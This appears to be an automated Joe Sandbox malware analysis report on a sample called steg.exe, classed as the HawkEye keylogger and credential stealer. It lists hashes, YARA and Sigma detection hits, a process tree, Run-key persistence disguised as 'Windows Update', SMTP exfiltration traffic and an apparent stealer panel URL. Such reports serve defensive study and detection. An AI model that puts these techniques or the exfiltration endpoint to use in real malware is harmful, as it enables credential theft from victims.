Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
steg.exe

Overview

General Information

Sample Name:steg.exe
Analysis ID:593806
MD5:30747bb37997b54d37bae65ae590b7e8
SHA1:d702ffaac8bf35f3372ef2c310b21eef8a91f6ea
SHA256:a39f2e3d1a27bd091c689a09499b374e5f6743de23b42bfd9c7a17c1d49dfad7
Tags:NETexehawkeyekeylogger
Infos:

Detection

HawkEye BrowserPasswordDump Tool EmailPasswordDump Tool
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected HawkEye Keylogger
Yara detected AntiVM3
Antivirus detection for dropped file
Yara detected EmailPasswordDump Tool by SecurityXploded
Yara detected BrowserPasswordDump Tool by SecurityXploded
Multi AV Scanner detection for submitted file
Antivirus / Scanner detection for submitted sample
Detected HawkEye Rat
Multi AV Scanner detection for dropped file
Machine Learning detection for sample
May check the online IP address of the machine
.NET source code contains potential unpacker
Installs a global keyboard hook
.NET source code references suspicious native API functions
Contains functionality to log keystrokes (.Net Source)
Changes the view of files in windows explorer (hidden files and folders)
Found evasive API chain (trying to detect sleep duration tampering with parallel thread)
Machine Learning detection for dropped file
Antivirus or Machine Learning detection for unpacked file
One or more processes crash
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
HTTP GET or POST without a user agent
Uses insecure TLS / SSL version for HTTPS connection
Contains long sleeps (>= 3 min)
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Checks if the current process is being debugged
Creates a process in suspended mode (likely to inject code)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Sigma detected: CurrentVersion Autorun Keys Modification
May infect USB drives
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Yara detected Credential Stealer
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
AV process strings found (often used to terminate AV products)
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
Detected TCP or UDP traffic on non-standard ports
Uses SMTP (mail sending)
Creates a window with clipboard capturing capabilities
Sigma detected: Suspicious Outbound SMTP Connections
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Contains functionality to query network adapater information
Sigma detected: Autorun Keys Modification
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • steg.exe (PID: 6544 cmdline: "C:\Users\user\Desktop\steg.exe" MD5: 30747BB37997B54D37BAE65AE590B7E8)
    • Windows Update.exe (PID: 7000 cmdline: "C:\Users\user\AppData\Roaming\Windows Update.exe" MD5: 30747BB37997B54D37BAE65AE590B7E8)
      • dw20.exe (PID: 5912 cmdline: dw20.exe -x -s 2708 MD5: 8D10DA8A3E11747E51F23C882C22BBC3)
  • WindowsUpdate.exe (PID: 6424 cmdline: "C:\Users\user\AppData\Roaming\WindowsUpdate.exe" MD5: 30747BB37997B54D37BAE65AE590B7E8)
    • Windows Update.exe (PID: 5876 cmdline: "C:\Users\user\AppData\Roaming\Windows Update.exe" MD5: 30747BB37997B54D37BAE65AE590B7E8)
      • dw20.exe (PID: 5528 cmdline: dw20.exe -x -s 2676 MD5: 8D10DA8A3E11747E51F23C882C22BBC3)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
steg.exeSecurityXploded_Producer_StringDetects hacktools by SecurityXplodedFlorian Roth
  • 0x78b0f:$x1: http://securityxploded.com
  • 0xfee48:$x1: http://securityxploded.com
steg.exeJoeSecurity_EmailPasswordDump_ToolYara detected EmailPasswordDump Tool by SecurityXplodedJoe Security
    steg.exeJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      steg.exeJoeSecurity_HawkEyeYara detected HawkEye KeyloggerJoe Security
        steg.exeJoeSecurity_BrowserPasswordDump_ToolYara detected BrowserPasswordDump Tool by SecurityXplodedJoe Security

          Dropped Files

          SourceRuleDescriptionAuthorStrings
          C:\Users\user\AppData\Roaming\WindowsUpdate.exeSecurityXploded_Producer_StringDetects hacktools by SecurityXplodedFlorian Roth
          • 0x78b0f:$x1: http://securityxploded.com
          • 0xfee48:$x1: http://securityxploded.com
          C:\Users\user\AppData\Roaming\WindowsUpdate.exeJoeSecurity_EmailPasswordDump_ToolYara detected EmailPasswordDump Tool by SecurityXplodedJoe Security
            C:\Users\user\AppData\Roaming\WindowsUpdate.exeJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              C:\Users\user\AppData\Roaming\WindowsUpdate.exeJoeSecurity_HawkEyeYara detected HawkEye KeyloggerJoe Security
                C:\Users\user\AppData\Roaming\WindowsUpdate.exeJoeSecurity_BrowserPasswordDump_ToolYara detected BrowserPasswordDump Tool by SecurityXplodedJoe Security
                  Click to see the 5 entries

                  Memory Dumps

                  SourceRuleDescriptionAuthorStrings
                  0000000E.00000002.359909884.0000000003801000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_HawkEyeYara detected HawkEye KeyloggerJoe Security
                    0000000C.00000002.333085217.00000000002C2000.00000002.00000001.01000000.00000008.sdmpJoeSecurity_EmailPasswordDump_ToolYara detected EmailPasswordDump Tool by SecurityXplodedJoe Security
                      0000000C.00000002.333085217.00000000002C2000.00000002.00000001.01000000.00000008.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                        0000000C.00000002.333085217.00000000002C2000.00000002.00000001.01000000.00000008.sdmpJoeSecurity_HawkEyeYara detected HawkEye KeyloggerJoe Security
                          0000000C.00000002.333085217.00000000002C2000.00000002.00000001.01000000.00000008.sdmpJoeSecurity_BrowserPasswordDump_ToolYara detected BrowserPasswordDump Tool by SecurityXplodedJoe Security
                            Click to see the 79 entries

                            Unpacked PEs

                            SourceRuleDescriptionAuthorStrings
                            4.2.Windows Update.exe.9d97c.1.unpackSecurityXploded_Producer_StringDetects hacktools by SecurityXplodedFlorian Roth
                            • 0x726cc:$x1: http://securityxploded.com
                            4.2.Windows Update.exe.9d97c.1.unpackJoeSecurity_EmailPasswordDump_ToolYara detected EmailPasswordDump Tool by SecurityXplodedJoe Security
                              12.2.WindowsUpdate.exe.2cb377.2.unpackSecurityXploded_Producer_StringDetects hacktools by SecurityXplodedFlorian Roth
                              • 0x6e998:$x1: http://securityxploded.com
                              12.2.WindowsUpdate.exe.2cb377.2.unpackJoeSecurity_BrowserPasswordDump_ToolYara detected BrowserPasswordDump Tool by SecurityXplodedJoe Security
                                4.0.Windows Update.exe.1b377.2.unpackSecurityXploded_Producer_StringDetects hacktools by SecurityXplodedFlorian Roth
                                • 0x6e998:$x1: http://securityxploded.com
                                Click to see the 242 entries

                                Sigma Signatures

                                There are no malicious signatures, click here to show all signatures.

                                Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Roaming\WindowsUpdate.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Roaming\Windows Update.exe, ProcessId: 7000, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Windows Update
                                Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 108.177.127.109, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Users\user\AppData\Roaming\Windows Update.exe, Initiated: true, ProcessId: 7000, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49771
                                Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton: Data: Details: C:\Users\user\AppData\Roaming\WindowsUpdate.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Roaming\Windows Update.exe, ProcessId: 7000, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Windows Update
                                Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Users\user\Desktop\steg.exe, ProcessId: 6544, TargetFilename: C:\Users\user\AppData\Roaming\Windows Update.exe

                                Joe Sandbox Signatures

                                Click to jump to signature section

                                Show All Signature Results

                                AV Detection

                                barindex
                                Antivirus detection for dropped file
                                Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeAvira: detection malicious, Label: TR/Golroted.xous
                                Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeAvira: detection malicious, Label: TR/Spy.Gen
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeAvira: detection malicious, Label: TR/Golroted.xous
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeAvira: detection malicious, Label: TR/Spy.Gen
                                Multi AV Scanner detection for submitted file
                                Source: steg.exeVirustotal: Detection: 71%Perma Link
                                Source: steg.exeReversingLabs: Detection: 88%
                                Antivirus / Scanner detection for submitted sample
                                Source: steg.exeAvira: detected
                                Source: steg.exeAvira: detected
                                Multi AV Scanner detection for dropped file
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeReversingLabs: Detection: 88%
                                Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeReversingLabs: Detection: 88%
                                Machine Learning detection for sample
                                Source: steg.exeJoe Sandbox ML: detected
                                Machine Learning detection for dropped file
                                Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeJoe Sandbox ML: detected
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeJoe Sandbox ML: detected
                                Source: 12.0.WindowsUpdate.exe.2c0000.0.unpackAvira: Label: TR/Golroted.xous
                                Source: 12.0.WindowsUpdate.exe.2c0000.0.unpackAvira: Label: TR/Spy.Gen
                                Source: 12.2.WindowsUpdate.exe.2c0000.0.unpackAvira: Label: TR/Golroted.xous
                                Source: 12.2.WindowsUpdate.exe.2c0000.0.unpackAvira: Label: TR/Spy.Gen
                                Source: 14.2.Windows Update.exe.ac0000.0.unpackAvira: Label: TR/Golroted.xous
                                Source: 14.2.Windows Update.exe.ac0000.0.unpackAvira: Label: TR/Spy.Gen
                                Source: 14.0.Windows Update.exe.ac0000.0.unpackAvira: Label: TR/Golroted.xous
                                Source: 14.0.Windows Update.exe.ac0000.0.unpackAvira: Label: TR/Spy.Gen
                                Source: 4.0.Windows Update.exe.10000.9.unpackAvira: Label: TR/Golroted.xous
                                Source: 4.0.Windows Update.exe.10000.9.unpackAvira: Label: TR/Spy.Gen
                                Source: 0.0.steg.exe.f80000.0.unpackAvira: Label: TR/Golroted.xous
                                Source: 0.0.steg.exe.f80000.0.unpackAvira: Label: TR/Spy.Gen
                                Source: 4.0.Windows Update.exe.10000.6.unpackAvira: Label: TR/Golroted.xous
                                Source: 4.0.Windows Update.exe.10000.6.unpackAvira: Label: TR/Spy.Gen
                                Source: 4.0.Windows Update.exe.10000.0.unpackAvira: Label: TR/Golroted.xous
                                Source: 4.0.Windows Update.exe.10000.0.unpackAvira: Label: TR/Spy.Gen
                                Source: 14.0.Windows Update.exe.ac0000.9.unpackAvira: Label: TR/Golroted.xous
                                Source: 14.0.Windows Update.exe.ac0000.9.unpackAvira: Label: TR/Spy.Gen
                                Source: 14.0.Windows Update.exe.ac0000.3.unpackAvira: Label: TR/Golroted.xous
                                Source: 14.0.Windows Update.exe.ac0000.3.unpackAvira: Label: TR/Spy.Gen
                                Source: 4.0.Windows Update.exe.10000.3.unpackAvira: Label: TR/Golroted.xous
                                Source: 4.0.Windows Update.exe.10000.3.unpackAvira: Label: TR/Spy.Gen
                                Source: 14.0.Windows Update.exe.ac0000.6.unpackAvira: Label: TR/Golroted.xous
                                Source: 14.0.Windows Update.exe.ac0000.6.unpackAvira: Label: TR/Spy.Gen
                                Source: 0.2.steg.exe.f80000.0.unpackAvira: Label: TR/Golroted.xous
                                Source: 0.2.steg.exe.f80000.0.unpackAvira: Label: TR/Spy.Gen
                                Source: 4.2.Windows Update.exe.10000.0.unpackAvira: Label: TR/Golroted.xous
                                Source: 4.2.Windows Update.exe.10000.0.unpackAvira: Label: TR/Spy.Gen
                                Source: unknownHTTPS traffic detected: 104.16.155.36:443 -> 192.168.2.4:49770 version: TLS 1.0
                                Source: unknownHTTPS traffic detected: 104.16.155.36:443 -> 192.168.2.4:49779 version: TLS 1.0
                                Source: steg.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                                Source: C:\Users\user\Desktop\steg.exeFile opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_d08c58b4442ba54f\MSVCR80.dllJump to behavior
                                Source: steg.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                Source: Binary string: mscorlib.pdbcorlib.pdbpdblib.pdb2.0.0.0__b77a5c561934e089\mscorlib.pdbfX source: Windows Update.exe, 00000004.00000002.305764946.00000000071AA000.00000004.00000010.00020000.00000000.sdmp
                                Source: Binary string: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.pdb source: Windows Update.exe, 0000000E.00000002.358374022.00000000012A7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb] z source: Windows Update.exe, 0000000E.00000002.360415585.00000000074C0000.00000004.00000800.00020000.00000000.sdmp
                                Source: Binary string: mscorlib.pdb source: Windows Update.exe, 00000004.00000002.305764946.00000000071AA000.00000004.00000010.00020000.00000000.sdmp, Windows Update.exe, 0000000E.00000002.360778956.0000000007D9A000.00000004.00000010.00020000.00000000.sdmp, Windows Update.exe, 0000000E.00000002.358374022.00000000012A7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: Windows Update.exe, 00000004.00000002.303247628.0000000005ECF000.00000004.00000800.00020000.00000000.sdmp
                                Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: Windows Update.exe, 00000004.00000002.303247628.0000000005ECF000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 0000000E.00000002.357606780.00000000011EE000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: \??\C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.pdbQ source: Windows Update.exe, 00000004.00000002.303247628.0000000005ECF000.00000004.00000800.00020000.00000000.sdmp
                                Source: Binary string: \??\C:\Users\user\AppData\Roaming\Windows Update.PDB source: Windows Update.exe, 0000000E.00000002.360415585.00000000074C0000.00000004.00000800.00020000.00000000.sdmp
                                Source: Binary string: mscorlib.pdbcorlib.pdbpdblib.pdb2.0.0.0__b77a5c561934e089\mscorlib.pdb* source: Windows Update.exe, 0000000E.00000002.360778956.0000000007D9A000.00000004.00000010.00020000.00000000.sdmp
                                Source: Binary string: \??\C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.pdbT source: Windows Update.exe, 0000000E.00000002.360478995.0000000007506000.00000004.00000800.00020000.00000000.sdmp
                                Source: Binary string: C:\Windows\assembly\GA.pdbmscorlib\2.0.0.0__b77a5c561934e089\mscorlib.dll source: Windows Update.exe, 00000004.00000002.305764946.00000000071AA000.00000004.00000010.00020000.00000000.sdmp, Windows Update.exe, 0000000E.00000002.360778956.0000000007D9A000.00000004.00000010.00020000.00000000.sdmp
                                Source: Binary string: indows\mscorlib.pdbpdblib.pdb source: Windows Update.exe, 0000000E.00000002.358374022.00000000012A7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: 1ioC:\Windows\mscorlib.pdb source: Windows Update.exe, 00000004.00000002.305764946.00000000071AA000.00000004.00000010.00020000.00000000.sdmp, Windows Update.exe, 0000000E.00000002.360778956.0000000007D9A000.00000004.00000010.00020000.00000000.sdmp
                                Source: Binary string: C:\Windows\dll\mscorlib.pdb source: Windows Update.exe, 0000000E.00000002.358374022.00000000012A7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: mscorlib.pdbndows Update.exe source: Windows Update.exe, 0000000E.00000002.358374022.00000000012A7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: C:\Windows\mscorlib.pdbf source: Windows Update.exe, 0000000E.00000002.358374022.00000000012A7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: symbols\dll\mscorlib.pdb* source: Windows Update.exe, 0000000E.00000002.360778956.0000000007D9A000.00000004.00000010.00020000.00000000.sdmp
                                Source: Binary string: \??\C:\Windows\mscorlib.pdb 1X source: Windows Update.exe, 0000000E.00000002.360415585.00000000074C0000.00000004.00000800.00020000.00000000.sdmp
                                Source: Binary string: rlib.pdb source: Windows Update.exe, 0000000E.00000002.358374022.00000000012A7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: mscorlib.pdbH source: Windows Update.exe, 00000004.00000002.305764946.00000000071AA000.00000004.00000010.00020000.00000000.sdmp, Windows Update.exe, 0000000E.00000002.360778956.0000000007D9A000.00000004.00000010.00020000.00000000.sdmp
                                Source: Binary string: C:\Windows\symbols\dll\mscorlib.pdb source: Windows Update.exe, 0000000E.00000002.358374022.00000000012A7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: symbols\dll\mscorlib.pdbf source: Windows Update.exe, 00000004.00000002.305764946.00000000071AA000.00000004.00000010.00020000.00000000.sdmp
                                Source: steg.exeBinary or memory string: autorun.inf
                                Source: steg.exeBinary or memory string: [autorun]
                                Source: steg.exe, 00000000.00000002.282081034.0000000000F82000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: autorun.inf
                                Source: steg.exe, 00000000.00000002.282081034.0000000000F82000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: [autorun]
                                Source: steg.exe, 00000000.00000003.272692370.00000000017E4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: autorun.inf
                                Source: steg.exe, 00000000.00000003.272692370.00000000017E4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [autorun]
                                Source: Windows Update.exeBinary or memory string: autorun.inf
                                Source: Windows Update.exeBinary or memory string: [autorun]
                                Source: Windows Update.exe, 00000004.00000000.276220199.0000000000012000.00000002.00000001.01000000.00000007.sdmpBinary or memory string: autorun.inf
                                Source: Windows Update.exe, 00000004.00000000.276220199.0000000000012000.00000002.00000001.01000000.00000007.sdmpBinary or memory string: [autorun]
                                Source: Windows Update.exe, 00000004.00000003.292924659.0000000005EEC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: autorun.inf
                                Source: Windows Update.exe, 00000004.00000003.292924659.0000000005EEC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: [autorun]
                                Source: Windows Update.exe, 00000004.00000002.302693901.0000000002BB2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: autorun.inf
                                Source: Windows Update.exe, 00000004.00000002.302693901.0000000002BB2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: [autorun]
                                Source: WindowsUpdate.exeBinary or memory string: [autorun]
                                Source: WindowsUpdate.exeBinary or memory string: autorun.inf
                                Source: WindowsUpdate.exe, 0000000C.00000002.333085217.00000000002C2000.00000002.00000001.01000000.00000008.sdmpBinary or memory string: autorun.inf
                                Source: WindowsUpdate.exe, 0000000C.00000002.333085217.00000000002C2000.00000002.00000001.01000000.00000008.sdmpBinary or memory string: [autorun]
                                Source: Windows Update.exeBinary or memory string: [autorun]
                                Source: Windows Update.exeBinary or memory string: autorun.inf
                                Source: Windows Update.exe, 0000000E.00000000.330022226.0000000000AC2000.00000002.00000001.01000000.00000007.sdmpBinary or memory string: autorun.inf
                                Source: Windows Update.exe, 0000000E.00000000.330022226.0000000000AC2000.00000002.00000001.01000000.00000007.sdmpBinary or memory string: [autorun]
                                Source: Windows Update.exe, 0000000E.00000002.359982109.0000000003824000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: autorun.inf
                                Source: Windows Update.exe, 0000000E.00000002.359982109.0000000003824000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: [autorun]
                                Source: steg.exeBinary or memory string: autorun.inf
                                Source: steg.exeBinary or memory string: [autorun]
                                Source: WindowsUpdate.exe.4.drBinary or memory string: autorun.inf
                                Source: WindowsUpdate.exe.4.drBinary or memory string: [autorun]
                                Source: Windows Update.exe.0.drBinary or memory string: autorun.inf
                                Source: Windows Update.exe.0.drBinary or memory string: [autorun]
                                Source: C:\Users\user\Desktop\steg.exeCode function: 4x nop then lea esp, dword ptr [ebp-0Ch]0_2_03370728
                                Source: C:\Users\user\Desktop\steg.exeCode function: 4x nop then lea esp, dword ptr [ebp-0Ch]0_2_033714C8
                                Source: C:\Users\user\Desktop\steg.exeCode function: 4x nop then jmp 03371A7Bh0_2_033719B8
                                Source: C:\Users\user\Desktop\steg.exeCode function: 4x nop then jmp 03371A7Bh0_2_033719A8
                                Source: C:\Users\user\Desktop\steg.exeCode function: 4x nop then lea esp, dword ptr [ebp-0Ch]0_2_03371800
                                Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeCode function: 4x nop then jmp 04BA1A7Bh12_2_04BA19B8
                                Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeCode function: 4x nop then lea esp, dword ptr [ebp-0Ch]12_2_04BA0728
                                Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeCode function: 4x nop then jmp 04BA1A7Bh12_2_04BA19A8
                                Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeCode function: 4x nop then lea esp, dword ptr [ebp-0Ch]12_2_04BA1800
                                Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeCode function: 4x nop then lea esp, dword ptr [ebp-0Ch]12_2_04BA14C8
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 4x nop then lea esp, dword ptr [ebp-08h]14_2_053A6228
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 4x nop then lea esp, dword ptr [ebp-0Ch]14_2_053A0728
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 4x nop then lea esp, dword ptr [ebp-08h]14_2_053A6218
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 4x nop then lea esp, dword ptr [ebp-0Ch]14_2_053A1800
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 4x nop then jmp 053A1A7Bh14_2_053A19B8
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 4x nop then jmp 053A1A7Bh14_2_053A19A8
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 4x nop then mov esp, ebp14_2_053A4780
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 4x nop then lea esp, dword ptr [ebp-0Ch]14_2_053A14C8

                                Networking

                                barindex
                                May check the online IP address of the machine
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeDNS query: name: whatismyipaddress.com
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeDNS query: name: whatismyipaddress.com
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeDNS query: name: whatismyipaddress.com
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeDNS query: name: whatismyipaddress.com
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeDNS query: name: whatismyipaddress.com
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeDNS query: name: whatismyipaddress.com
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeDNS query: name: whatismyipaddress.com
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeDNS query: name: whatismyipaddress.com
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeDNS query: name: whatismyipaddress.com
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeDNS query: name: whatismyipaddress.com
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeDNS query: name: whatismyipaddress.com
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeDNS query: name: whatismyipaddress.com
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeDNS query: name: whatismyipaddress.com
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeDNS query: name: whatismyipaddress.com
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeDNS query: name: whatismyipaddress.com
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeDNS query: name: whatismyipaddress.com
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeDNS query: name: whatismyipaddress.com
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeDNS query: name: whatismyipaddress.com
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeDNS query: name: whatismyipaddress.com
                                Source: C:\Users\user\AppData\Roaming\Windows Update.exeDNS query: name: whatismyipaddress.com
                                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: whatismyipaddress.comConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: whatismyipaddress.comConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: whatismyipaddress.comConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: whatismyipaddress.comConnection: Keep-Alive
                                Source: unknownHTTPS traffic detected: 104.16.155.36:443 -> 192.168.2.4:49770 version: TLS 1.0
                                Source: unknownHTTPS traffic detected: 104.16.155.36:443 -> 192.168.2.4:49779 version: TLS 1.0
                                Source: global trafficTCP traffic: 192.168.2.4:49771 -> 108.177.127.109:587
                                Source: global trafficTCP traffic: 192.168.2.4:49771 -> 108.177.127.109:587
                                Source: Windows Update.exe, Windows Update.exe, 0000000E.00000000.330022226.0000000000AC2000.00000002.00000001.01000000.00000007.sdmp, steg.exe, WindowsUpdate.exe.4.dr, Windows Update.exe.0.drString found in binary or memory: http://192.99.212.64/WebPanel/log.php?username=
                                Source: Windows Update.exe, 0000000E.00000002.358146560.0000000001249000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                                Source: Windows Update.exe, 00000004.00000002.303327617.0000000005F06000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 00000004.00000002.302708796.0000000002BB6000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 00000004.00000002.303247628.0000000005ECF000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 0000000E.00000002.360478995.0000000007506000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 0000000E.00000002.359982109.0000000003824000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.pki.goog/gsr1/gsr1.crl0;
                                Source: Windows Update.exe, 00000004.00000002.303327617.0000000005F06000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 00000004.00000002.302708796.0000000002BB6000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 00000004.00000002.303247628.0000000005ECF000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 0000000E.00000002.360478995.0000000007506000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 0000000E.00000002.359982109.0000000003824000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.pki.goog/gtsr1/gtsr1.crl0W
                                Source: Windows Update.exe, 00000004.00000002.303327617.0000000005F06000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 00000004.00000002.302708796.0000000002BB6000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 00000004.00000002.303247628.0000000005ECF000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 0000000E.00000002.360478995.0000000007506000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 0000000E.00000002.359982109.0000000003824000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 0000000E.00000002.360008316.000000000382A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crls.pki.goog/gts1c3/QOvJ0N1sT2A.crl0
                                Source: Windows Update.exeString found in binary or memory: http://digg.com
                                Source: Windows Update.exeString found in binary or memory: http://dyn.com/dns/
                                Source: steg.exe, WindowsUpdate.exe.4.dr, Windows Update.exe.0.drString found in binary or memory: http://dyn.com/dns//
                                Source: steg.exe, 00000000.00000002.283720083.0000000006E12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://fontfabrik.com
                                Source: Windows Update.exe, 00000004.00000002.303327617.0000000005F06000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 00000004.00000002.302708796.0000000002BB6000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 00000004.00000002.303247628.0000000005ECF000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 0000000E.00000002.360478995.0000000007506000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 0000000E.00000002.359982109.0000000003824000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.pki.goog/gsr10)
                                Source: Windows Update.exe, 00000004.00000002.303327617.0000000005F06000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 00000004.00000002.302708796.0000000002BB6000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 00000004.00000002.303247628.0000000005ECF000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 0000000E.00000002.360478995.0000000007506000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 0000000E.00000002.359982109.0000000003824000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 0000000E.00000002.360008316.000000000382A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.pki.goog/gts1c301
